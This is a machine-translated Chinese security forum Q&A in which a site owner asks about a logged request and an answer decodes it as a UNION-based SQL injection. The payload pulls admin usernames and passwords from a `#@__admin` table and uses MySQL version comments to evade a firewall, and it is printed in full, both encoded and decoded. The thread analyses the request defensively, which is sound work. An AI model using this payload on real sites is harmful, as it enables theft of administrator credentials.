security - 需要 SQL 注入(inject)帮助

Question

我试图理解下面的注入(inject)以及它试图做什么。它想要得到什么？我唯一理解的部分是联合和选择部分，但我不确定并需要帮助理解的完整注入(inject)。

action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/!50000union//!50000select/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C%27%60+&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-stream&_FILES%5Btype%5D%5Bsize%5D=4294

Answer 1

好吧，首先我们可以对字符串进行url解码:

action=
&aid=1
&_FILES[type][tmp_name]=\' or mid=@`\'`/!50000union//!50000select/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\'` 
&_FILES[type][name]=1.jpg
&_FILES[type][type]=application/octet-stream
&_FILES[type][size]=4294

其中一个参数非常可疑。

[tmp_name]=\' OR mid=@`\'`
    /!50000union/
    /!50000select/1,2,3,
        (select CONCAT(0x7c,userid,0x7c,pwd) 
         from `#@__admin` 
         limit 0,1)
     ,5,6,7,8,9#@`\'`

用简单的英语来说，它注入(inject)了一个选择查询以获取格式如 0x7c<user>0x7c<password> 的用户名和密码。来自 #@__admin表(根据@DCoder 的说法，这可能是保留这些值的实际表的占位符)并将其附加到您的原始选择中。

!50000 stuff 用于绕过您的 Web 应用程序防火墙(如果您有的话)。如果您不这样做，那么它可能只是一个机器人或自动尝试。或者有人按照脚本查看有效的方法。这些数字并不是很有用——它可能是为了逃避防火墙，或者只是为了让攻击者进行调试以查看输出的外观。不运行就很难说了。

这是攻击者试图运行的 SQL 在“普通 SQL”中的样子:

select 
    userid,
    pwd
from 
    `#@__admin` 

你们有这样的 table 吗？当您转到您网站的这个 url 时，它会转储用户表吗？如果没有，那么您甚至可能没有问题，这只是一次自动扫描。您可能仍然遇到 SQL 注入(inject)问题，即使它不起作用，但在您的日志中出现此问题并不是违规的证据……但这绝对是一个危险信号。